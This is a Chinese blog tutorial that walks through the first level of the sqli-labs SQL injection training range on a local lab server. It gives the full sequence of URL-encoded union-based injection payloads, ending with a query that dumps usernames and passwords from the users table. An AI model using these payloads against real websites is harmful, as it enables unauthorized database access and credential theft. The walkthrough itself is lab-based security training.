SQL闯关第一关

最新推荐文章于 2024-06-15 12:40:49 发布
最新推荐文章于 2024-06-15 12:40:49 发布
阅读量130 收藏 1
点赞数 1
分类专栏: SQL闯关 网络安全 文章标签: sql 数据库 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/132079132
版权

文章目录

前言

这篇文章将介绍sql闯关中第一关的通关过程。第一关图片如下。

笔者推荐使用火狐浏览器进行打开,当然本文的基础是在读者已经安装了sql靶场和Wampserver64的基础之上。注意要先打开Wampserver64然后才能打开sql靶场。同时建议读者下载Hackbar这个扩展包,在火狐浏览器中的管理扩展里就能下载,下载扩展中可能会出现以下问题。主要是扩展包是否要付费。这里下载Hackbar V2这个现在是免费的。Hackbar已经变成付费。

 闯关过程

1:看是否存在注入漏洞

在浏览器上面输入以下网址

http://192.168.182.30/sql/Less-1/?id=1%27

因为是要在URL上面输入以下网址,所以要进行URL编码。这里%27指代的就是'。即是单引号。

这里显示如下图片。

通过以上报错提示说明存在sql注入漏洞。

2:看属于何种类型的漏洞

sql注入漏洞主要有两种一种是数值型漏洞,另一种是字符型漏洞。

接下来的思路是通过永真式和用永假式进行试探。

在URL上面输入的分别为下面的这两个。

http://192.168.182.30/sql/Less-1/?id=1%20and%201=1
http://192.168.182.30/sql/Less-1/?id=1%20and%201=2

这里%20在url编码格式中显示的是空格。

第一个这个URL显示的图片如下。

第二个这个URL显示的图片如下。

通过这两张图片我们可以看出Less-1存在的sql注入漏洞是字符型漏洞。

3:判断表中存在多少个字段

这里要用到sql中的order by语句,用到的测试URL有两个如下。

http://192.168.182.30/sql/Less-1/?id=1%27%20order%20by%203%23
http://192.168.182.30/sql/Less-1/?id=1%27%20order%20by%204%23

这两个url地址都有用到url编码进行转义,其中%27号是单引号,%20是空格,%23是#

第一个URL地址显示的图片为。

第二个URL地址显示的图片为。 

通过这两张图片我们可以看到sql中Less-1当中只有3个字段,因为当判断第4个字段是否存在的时候,这里显示报错。

4:通过字段数爆出表名和版本号

在这的上一步,我们已经知道Less-1中存在3个字段。所以之后将可以通过union来联合注入,填在浏览器上的URL地址如下。

http://192.168.182.30/sql/Less-1/?id=-1%27%20union%20select%201,2,3%23

注意:这里id的值要填为永假的一个值,否则Less-1运行URL地址网页里的内容是不变的。

结果图如下。

 接下来进行报表的名字和版本号,运行的URL网址如下。

http://192.168.182.30/sql/Less-1/?id=-1%27%20union%20select%201,database(),version()%23

 结果图如下。

 这里也就得到了Less-1的库名为security,版本号为5.7.24

5:通过库名爆出数据库中的表名

运行的URL地址如下

http://192.168.182.30/sql/Less1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%23

结果图如下

 注意

group_concat函数首先根据group by指定的列进行分组,将同一组的列显示出来,并且用分隔。由函数参数(字段名)决定要返回的列。

6:通过表名爆出字段名

运行的URL地址如下

http://192.168.182.30/sql/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27%23

结果图如下

注意

URL地址中都进行了URL编码。

接下来就可以将table_name中的内容不断地进行修改,其中的值就是我们之前爆出来的表名。

7:爆出字段内容

运行的URL地址如下

http://192.168.182.30/sql/Less-1/?id=-1%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20security.users%23

结果图如下

注意

这里0x3a 在ASCII编码中,十六进制数0x3a对应的字符是":

总结

进行sql注入打靶场时,最重要的就是拿到表中字段的内容。一般是发现已经有SQL注入漏洞,然后进行简单的判断是数值型漏洞还是字符型漏洞,之后判断表中字段的个数。在之后就是爆出库名,表名,字段名。最终爆出字段里的内容。

转瞬都有
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs第一关闯关
qq_45154529的博客
01-05 2045
第一关:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
SQL闯关第八关
转瞬都有的博客
08-05 219
本章主要涉及的情况主要是涉及有特别的回显,you are in...... 其他没有相关回显的情况。因此需要引用一个工具Burpsuite进行字典的爆破。对此本文也是介绍了相关详细的打sql第8关的相关步骤,希望对读者有所帮助。
SQL闯关第九关
转瞬都有的博客
08-28 108
本文基于的是SQL注入中的第九关,第九关主要利用的是SQL注入漏洞中的延时注入。本文在介绍了if(expr1,expr2,expr3)这个函数的用法的同时,介绍了SQL第九关的闯关流程。最后对这篇文章的知识点进行简单的总结。
sql注入第一关
computet_的博客
01-29 1256
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,目前是黑客对数据库进行攻击的最常用手段之一。
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 1870
SQL注入闯关
SQL闯关第十七关
转瞬都有的博客
08-07 103
本文介绍的是SQL注入闯关的第17关。笔者推荐使用的浏览器是火狐浏览器,由于第17关与之前的关卡的请求有所不同,不是GET请求,而是POST请求。同时也没有明显的回显。因此就需要Burpsuite进行爆破,在此基础上本文进行了详解。
sql-labs闯关1-10
ljlrookiebird的博客
04-11 508
原理跟第一关相同,单引号报错但是后面加注释又没办法使语句闭合,猜了半天是需要单引号和右括号才能使语句闭合,后台语句为select * from xxx where id=( '1' ) ,我们注入后的语句为:select * from xxx where id = (‘-1’)union select 1,2,database() --+ ')id=1' and if((length(database())>8),sleep(10),0) --+,页面十秒后加载。
sql-lab闯关
godfather914的博客
07-01 248
sql-lab闯关
SQL注入实验第一关.docx
07-04
SQL注入实验,其中的实验数据库是基于MySQL数据库,针对常见的SQL注入语句的操作。
基于Vue3和Elment Plus的在线编程闯关挑战网站设计源码
04-03
本设计源码提供了一个基于Vue3和Elment Plus的在线编程闯关挑战网站。项目包含166个文件,主要使用JavaScript、Vue、CSS和HTML编程语言。文件类型包括49个JavaScript脚本文件、35个Markdown文档、34个SQL数据库文件...
SQL了解第一章
03-14
数据库简介,和基本知识安装条件,只是基础,基础中的第一章
lab2_SQL.rar_oracle_oracle 10g lab2_sql lab第二关
09-24
oracle的实验 学习下挺有帮助的呵呵
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
SQL: 将一个表中查出来数据插入到另一个表中
我的博客
06-11 1387
SQL: 将一个表中查出来数据插入到另一个表中 insert into A(a,b,c) (select a,b,c from B) 2、假如A表不存在 select a,b,c into A from B 3、假如需要跨数据库 insert into ADB.[dbo].A(a,b,c) (select a,b,c from BDB.[dbo].B)
Mybatis 动态 SQL 语句
Zachyy的博客
06-10 788
MyBatis 是一个优秀的持久层框架,它支持定制化 SQL、存储过程以及高级映射。在 MyBatis 中,动态 SQL 是一个非常重要的特性,它允许我们。动态SQL技术是一种的功能,它存在的意义是为了解决拼接SQL语句字符串时的痛点问题。
mysql-线上常用运维sql-2
jll126的博客
06-11 454
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
MySQL的高可用方案:深入Galera Cluster和ProxySQL
最新发布
哎 你看的博客
06-15 1052
一、引言 背景和重要性 面临的挑战和问题 高可用性介绍 二、Galera Cluster Galera Cluster简介 定义和用途 工作原理 特点和优势 部署Galera Cluster 准备工作 安装和配置 集群初始化及节点添加 Galera Cluster的运维 监控和维护 故障恢复和备份 优化和性能调整 三、ProxySQL ProxySQL简介 定义和用途 工作原理 特点和优势 部署ProxySQL 准备工作 安装和配置 连接管理和路由 ProxySQL运维 监控和维护 故障恢复和备份
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 972
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
sqllibs 闯关
08-25
sqllibs闯关是一个关于SQL注入的平台,它提供了一系列的挑战和实践,让用户可以学习和测试SQL注入攻击的技术。通过在sqllibs闯关中完成各种任务,用户可以提升他们对SQL注入的理解和技能。在这个平台上,用户可以使用各种工具和技术来尝试不同类型的SQL注入攻击,如基于错误的注入、联合查询注入等。用户可以通过检测和利用应用程序中的SQL注入漏洞来获取敏感信息或者执行任意的数据库操作。通过挑战和实践,用户可以提高他们对SQL注入攻击的防御意识,并学习如何编写安全的代码来防止这类攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [sql-lib 闯关课程第一课](https://blog.csdn.net/m0_37175113/article/details/105753588)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [sqli-libs(1-6)闯关笔记(纯手注)](https://blog.csdn.net/qq_40671478/article/details/107968190)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值